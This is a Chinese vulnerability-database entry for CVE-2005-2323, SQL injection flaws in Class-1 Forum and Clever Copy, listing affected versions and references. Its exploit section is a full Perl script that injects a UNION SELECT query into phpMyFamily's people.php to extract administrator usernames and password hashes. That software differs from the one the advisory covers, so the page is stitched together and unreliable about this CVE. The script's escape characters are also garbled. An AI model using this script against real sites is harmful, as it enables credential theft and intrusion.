Class-1 Forum /Clever Copy SQL注入漏洞

Class-1 Forum /Clever Copy SQL注入漏洞

漏洞ID 1108583 漏洞类型 SQL注入
发布时间 2005-03-27 更新时间 2005-07-19
图片[1]-Class-1 Forum /Clever Copy SQL注入漏洞-安全小百科CVE编号 CVE-2005-2323
图片[2]-Class-1 Forum /Clever Copy SQL注入漏洞-安全小百科CNNVD-ID CNNVD-200507-216
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1208
https://www.securityfocus.com/bid/89015
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200507-216
|漏洞详情
CleverCopy是一款免费的站点架构和新闻发布程序。Class-1Forum0.24.4和0.23.2以及安装了论坛的CleverCopy存在多个SQL注入漏洞。远程攻击者可以通过(1)viewattach.php的id参数、(2)users.php的viewuser_id参数或viewforum.php的(3)id或(4)forum参数修改SQL语句。
|漏洞EXP
#!/usr/bin/perl -w
# phpMyFamily Exploit injection
# ==============================
$banner = "phpMyFamily Exploit injection nn==============================
nnINFGPG-Hacking&Security Research";
# 
# Greats: AresU (1st IndoSec Team),ADZ Security Team (has discovered bugs)
# Info: 98.to/infamous

use IO::Socket;
if ($#ARGV<0){
print "n$banner";
print "nn Usage: perl phpMyFamily.pl [host] [path] nn";
exit;}

$gen="%20UNION%20SELECT%20NULL,password,NULL,username,NULL,NULL,NULL,NULL,NUL
L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20family_users%20%20WH
ERE%20admin='Y'%20LIMIT%201,1"; # This selects first admin with login &
password hash :)

$serius="GET $ARGV[1]/$ARGV[2]/people.php?person=00002'$gen HTTP/1.0rnrn";
$muka=IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$ARGV[0]",PeerPort=>"80")
or die "$ARGV[0]Connection Failed !!nn";

$muka -> autoflush(1);
print $muka "$serius";   
print "[*]Sending exploit DONE nn";            
sleep(7);
close($muka);

# milw0rm.com [2005-03-27]
|受影响的产品
Clever Copy Clever Copy 0

class-1 Class-1 Forum 0.24.4

class-1 Class-1 Forum 0.23.2

|参考资料

来源:SECTRACK
名称:1014486
链接:http://securitytracker.com/id?1014486
来源:SECTRACK
名称:1014485
链接:http://securitytracker.com/id?1014485
来源:SECUNIA
名称:16078
链接:http://secunia.com/advisories/16078
来源:MISC
链接:http://lostmon.blogspot.com/2005/07/class-1-forum-software-cross-site.html

相关推荐: APBoard Protected Forum Thread Posting漏洞

APBoard Protected Forum Thread Posting漏洞 漏洞ID 1203411 漏洞类型 其他 发布时间 2002-12-31 更新时间 2002-12-31 CVE编号 CVE-2002-2398 CNNVD-ID CNNVD-2…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享